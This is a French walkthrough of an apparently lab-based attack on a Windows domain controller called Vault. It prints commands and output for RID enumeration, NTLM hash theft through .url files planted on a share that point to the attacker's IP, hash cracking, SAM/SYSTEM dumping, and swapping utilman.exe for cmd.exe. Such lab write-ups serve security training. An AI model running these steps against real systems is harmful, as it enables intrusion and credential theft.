# Vault `rid` `ntlm` `SeRestorePrivilege` * Nom machine : Vault * Difficulté : Difficile * OS : Windows ## Enumération ### NMAP ``` PORT STATE SERVICE REASON VERSION 53/tcp open domain syn-ack Simple DNS Plus 88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2024-10-02 11:05:07Z) 135/tcp open msrpc syn-ack Microsoft Windows RPC 139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn 389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: vault.offsec0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? syn-ack 464/tcp open kpasswd5? syn-ack 593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped syn-ack 3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: vault.offsec0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped syn-ack 3389/tcp open ms-wbt-server syn-ack Microsoft Terminal Services |_ssl-date: 2024-10-02T11:06:35+00:00; +1s from scanner time. | rdp-ntlm-info: | Target_Name: VAULT | NetBIOS_Domain_Name: VAULT | NetBIOS_Computer_Name: DC | DNS_Domain_Name: vault.offsec | DNS_Computer_Name: DC.vault.offsec | DNS_Tree_Name: vault.offsec | Product_Version: 10.0.17763 |_ System_Time: 2024-10-02T11:05:55+00:00 | ssl-cert: Subject: commonName=DC.vault.offsec | Issuer: commonName=DC.vault.offsec | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2024-08-01T02:09:28 | Not valid after: 2025-01-31T02:09:28 | MD5: 6cb2:aab3:f717:80bf:6165:7dcc:4fca:92a3 | SHA-1: f155:3524:94c5:522d:0300:245a:53fa:7b13:e8ae:e219 | -----BEGIN CERTIFICATE----- | MIIC4jCCAcqgAwIBAgIQIXm05T2DbrJJj6OtuSIdhTANBgkqhkiG9w0BAQsFADAa | MRgwFgYDVQQDEw9EQy52YXVsdC5vZmZzZWMwHhcNMjQwODAxMDIwOTI4WhcNMjUw | MTMxMDIwOTI4WjAaMRgwFgYDVQQDEw9EQy52YXVsdC5vZmZzZWMwggEiMA0GCSqG | SIb3DQEBAQUAA4IBDwAwggEKAoIBAQDNl3Dno4YF5jgm9jJscrc+ACEhH/8eGx90 | WHSqUzg1nX+JLQ4LdY+3fSc/wgJOND7HawjdJZqpK0xlPxR90WK5OKGUV+Ccf/xo | PWdqXRObI312SaLp48JOPIwYBVrroBGgFHjji0WBxWk4kR+gHVUvpbiEp2c2FC0x | erWw7dwUb8OeU+HuYiSyFmAw+eNyNa/ffI4AezvokUu5kqnYyt3HgAgWTsgbl4nr | txjfmSLdLmkIymjnKPwlOSWIK9ImXfbSj158IMbZ0IPakdkYP75qrjkLR1LZS4a1 | b1i8poGjACEIjM9rnH9nFrQb7HG+6yQIZjmnE3LH/6cKhlRwNb8RAgMBAAGjJDAi | MBMGA1UdJQQMMAoGCCsGAQUFBwMBMAsGA1UdDwQEAwIEMDANBgkqhkiG9w0BAQsF | AAOCAQEAVuIIDodAh0PRCBae72EgBjLwGVPovt5VwXserXpu2+h/+vSX4fz8VwsL | DCyxXQQ8TCcZV1RIO+kPqYxjsr9/UpBl70w1/81eXQipMX455MankmFoWl6C12lE | aOCrGKSRNcWXoTmL/Ci8vS/0YQzfbyRnhVlLCH4KTp2q5szpt0oV5PMTwLEfMsNF | 3FCEF2QxhneFtYLUXC6z0evt/iibPMeJG92j1X2I9Ffzbyzt2HdqNRQaoELr/ieS | 2JoSJ+latRL7ntuoDHaoMRXEN0fr6QEiK6IJs83KMo0Py2mXSNBotfINoF28w0KE | 9hIcCfKcmNHixb3wlOA7VY4l9iy25w== |_-----END CERTIFICATE----- 5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 9389/tcp open mc-nmf syn-ack .NET Message Framing 49666/tcp open msrpc syn-ack Microsoft Windows RPC 49668/tcp open msrpc syn-ack Microsoft Windows RPC 49675/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0 49676/tcp open msrpc syn-ack Microsoft Windows RPC 49681/tcp open msrpc syn-ack Microsoft Windows RPC 49708/tcp open msrpc syn-ack Microsoft Windows RPC Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: 1s, deviation: 0s, median: 0s | p2p-conficker: | Checking for Conficker.C or higher... | Check 1 (port 43470/tcp): CLEAN (Timeout) | Check 2 (port 16135/tcp): CLEAN (Timeout) | Check 3 (port 47107/udp): CLEAN (Timeout) | Check 4 (port 8957/udp): CLEAN (Timeout) |_ 0/4 checks are positive: Host is CLEAN or ports are blocked | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required | smb2-time: | date: 2024-10-02T11:05:59 |_ start_date: N/A ``` /etc/hosts : vault.offsec ### SMB Nous avons accès à un partage SMB mais le dossier est vide. Nous allons bruteforce les rid. ``` ┌──(kali㉿kali)-[~] └─$ crackmapexec smb vault.offsec -u guest -p '' --rid-brut SMB vault.offsec 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:vault.offsec) (signing:True) (SMBv1:False) SMB vault.offsec 445 DC [+] vault.offsec\guest: SMB vault.offsec 445 DC [+] Brute forcing RIDs SMB vault.offsec 445 DC 498: VAULT\Enterprise Read-only Domain Controllers (SidTypeGroup) SMB vault.offsec 445 DC 500: VAULT\Administrator (SidTypeUser) SMB vault.offsec 445 DC 501: VAULT\Guest (SidTypeUser) SMB vault.offsec 445 DC 502: VAULT\krbtgt (SidTypeUser) SMB vault.offsec 445 DC 512: VAULT\Domain Admins (SidTypeGroup) SMB vault.offsec 445 DC 513: VAULT\Domain Users (SidTypeGroup) SMB vault.offsec 445 DC 514: VAULT\Domain Guests (SidTypeGroup) SMB vault.offsec 445 DC 515: VAULT\Domain Computers (SidTypeGroup) SMB vault.offsec 445 DC 516: VAULT\Domain Controllers (SidTypeGroup) SMB vault.offsec 445 DC 517: VAULT\Cert Publishers (SidTypeAlias) SMB vault.offsec 445 DC 518: VAULT\Schema Admins (SidTypeGroup) SMB vault.offsec 445 DC 519: VAULT\Enterprise Admins (SidTypeGroup) SMB vault.offsec 445 DC 520: VAULT\Group Policy Creator Owners (SidTypeGroup) SMB vault.offsec 445 DC 521: VAULT\Read-only Domain Controllers (SidTypeGroup) SMB vault.offsec 445 DC 522: VAULT\Cloneable Domain Controllers (SidTypeGroup) SMB vault.offsec 445 DC 525: VAULT\Protected Users (SidTypeGroup) SMB vault.offsec 445 DC 526: VAULT\Key Admins (SidTypeGroup) SMB vault.offsec 445 DC 527: VAULT\Enterprise Key Admins (SidTypeGroup) SMB vault.offsec 445 DC 553: VAULT\RAS and IAS Servers (SidTypeAlias) SMB vault.offsec 445 DC 571: VAULT\Allowed RODC Password Replication Group (SidTypeAlias) SMB vault.offsec 445 DC 572: VAULT\Denied RODC Password Replication Group (SidTypeAlias) SMB vault.offsec 445 DC 1000: VAULT\DC$ (SidTypeUser) SMB vault.offsec 445 DC 1101: VAULT\DnsAdmins (SidTypeAlias) SMB vault.offsec 445 DC 1102: VAULT\DnsUpdateProxy (SidTypeGroup) SMB vault.offsec 445 DC 1103: VAULT\anirudh (SidTypeUser) ``` anirudh est un username. Nous avons tenter de bruteforce son mot de passe à l'aide de kerbrute mais sans succès. Nous allons chercher à voler le hash NTLM. {% embed url="" %} ## Accès initial ``` ┌──(kali㉿kali)-[~/ntlm_theft] └─$ python3 ntlm_theft.py -g url -s 192.168.45.181 -f vault Created: vault/vault-(url).url (BROWSE TO FOLDER) Created: vault/vault-(icon).url (BROWSE TO FOLDER) Generation Complete. ┌──(kali㉿kali)-[~/ntlm_theft] └─$ cd vault ┌──(kali㉿kali)-[~/ntlm_theft/vault] └─$ ls 'vault-(icon).url' 'vault-(url).url' ┌──(kali㉿kali)-[~/ntlm_theft/vault] └─$ cat * [InternetShortcut] URL=whatever WorkingDirectory=whatever IconFile=\\192.168.45.181\%USERNAME%.icon IconIndex=1[InternetShortcut] URL=file://192.168.45.181/leak/leak.html ┌──(kali㉿kali)-[~/ntlm_theft/vault] └─$ smbclient //192.168.190.172/DocumentsShare Password for [WORKGROUP\kali]: Try "help" to get a list of possible commands. smb: \> put vault-(icon).url putting file vault-(icon).url as \vault-(icon).url (1.2 kb/s) (average 1.2 kb/s) ``` On lance responder pour capturer le hash ``` ┌──(kali㉿kali)-[~/oscp] └─$ sudo responder -I tun0 {...} [SMB] NTLMv2-SSP Client : 192.168.190.172 [SMB] NTLMv2-SSP Username : VAULT\anirudh [SMB] NTLMv2-SSP Hash : anirudh::VAULT:6f385e19f1a45653:CFF7B2468A10BCFD658482DB4266E7F5:01010000000000000006466E9F14DB018796A2AA8A30E2940000000002000800330047005700440001001E00570049004E002D003000460033005500460035004A004300580049005A0004003400570049004E002D003000460033005500460035004A004300580049005A002E0033004700570044002E004C004F00430041004C000300140033004700570044002E004C004F00430041004C000500140033004700570044002E004C004F00430041004C00070008000006466E9F14DB0106000400020000000800300030000000000000000100000000200000A26B564BC75A19D5CF9CFDC087083FCDDB4C8E97519F75A674E3DF5FA98AC4860A001000000000000000000000000000000000000900260063006900660073002F003100390032002E003100360038002E00340035002E003100380031000000000000000000 ``` Nous allons cracker le hash NTLM avec hashcat ``` ┌──(kali㉿kali)-[~/oscp/vault] └─$ hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt {...} ANIRUDH::VAULT:6f385e19f1a45653:cff7b2468a10bcfd658482db4266e7f5:01010000000000000006466e9f14db018796a2aa8a30e2940000000002000800330047005700440001001e00570049004e002d003000460033005500460035004a004300580049005a0004003400570049004e002d003000460033005500460035004a004300580049005a002e0033004700570044002e004c004f00430041004c000300140033004700570044002e004c004f00430041004c000500140033004700570044002e004c004f00430041004c00070008000006466e9f14db0106000400020000000800300030000000000000000100000000200000a26b564bc75a19d5cf9cfdc087083fcddb4c8e97519f75a674e3df5fa98ac4860a001000000000000000000000000000000000000900260063006900660073002f003100390032002e003100360038002e00340035002e003100380031000000000000000000:SecureHM ``` Nous aurions plus le cracker comme dit précédemment avec kerbrute mais cela aurait pris beaucoup trop de temps. ``` ┌──(kali㉿kali)-[~/oscp/vault] └─$ grep -n SecureHM /usr/share/wordlists/rockyou.txt 10608878:SecureHM ``` ``` ┌──(kali㉿kali)-[~/oscp/vault] └─$ evil-winrm -u anirudh -p SecureHM -i vault.offsec Evil-WinRM shell v3.5 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\anirudh\Documents> whoami vault\anirudh ``` ## Elévation des privilèges ``` PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= =================================== ======= SeMachineAccountPrivilege Add workstations to domain Enabled SeSystemtimePrivilege Change the system time Enabled SeBackupPrivilege Back up files and directories Enabled SeRestorePrivilege Restore files and directories Enabled SeShutdownPrivilege Shut down the system Enabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Enabled SeTimeZonePrivilege Change the time zone Enabled ``` `SeBackupPrivilege` {% embed url="" %} ``` *Evil-WinRM* PS C:\Users\anirudh\desktop> cd c:\ *Evil-WinRM* PS C:\> mkdir Temp Directory: C:\ Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 10/2/2024 5:03 AM Temp *Evil-WinRM* PS C:\> reg save hklm\sam c:\Temp\sam The operation completed successfully. *Evil-WinRM* PS C:\> reg save hklm\system c:\Temp\system The operation completed successfully. *Evil-WinRM* PS C:\> cd Temp *Evil-WinRM* PS C:\Temp> dir Directory: C:\Temp Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 10/2/2024 5:03 AM 49152 sam -a---- 10/2/2024 5:03 AM 16498688 system *Evil-WinRM* PS C:\Temp> download sam Info: Downloading C:\Temp\sam to sam Info: Download successful! *Evil-WinRM* PS C:\Temp> download system Info: Downloading C:\Temp\system to system Info: Download successful! ``` ``` ┌──(kali㉿kali)-[~/oscp/vault] └─$ impacket-secretsdump -sam sam -system system LOCAL Impacket v0.12.0.dev1 - Copyright 2023 Fortra [*] Target system bootKey: 0xe9a15188a6ad2d20d26fe2bc984b369e [*] Dumping local SAM hashes (uid:rid:lmhash:nthash) Administrator:500:aad3b435b51404eeaad3b435b51404ee:608339ddc8f434ac21945e026887dc36::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: [-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information. [*] Cleaning up... ``` Nous n'arrivons pas à nous connecter avec le hash, le compte doit être désactivé. Nous allons abuser du SeRestorePrivilege ``` *Evil-WinRM* PSmv c:\windows\system32\utilman.exe c:\windows\system32\utilman.old *Evil-WinRM* PS C:\Users\anirudh\Documents> mv c:\windows\system32\cmd.exe c:\windows\system32\utilman.exe ``` Pour appeler utilman.exe : windows + U via rdp (rdesktop)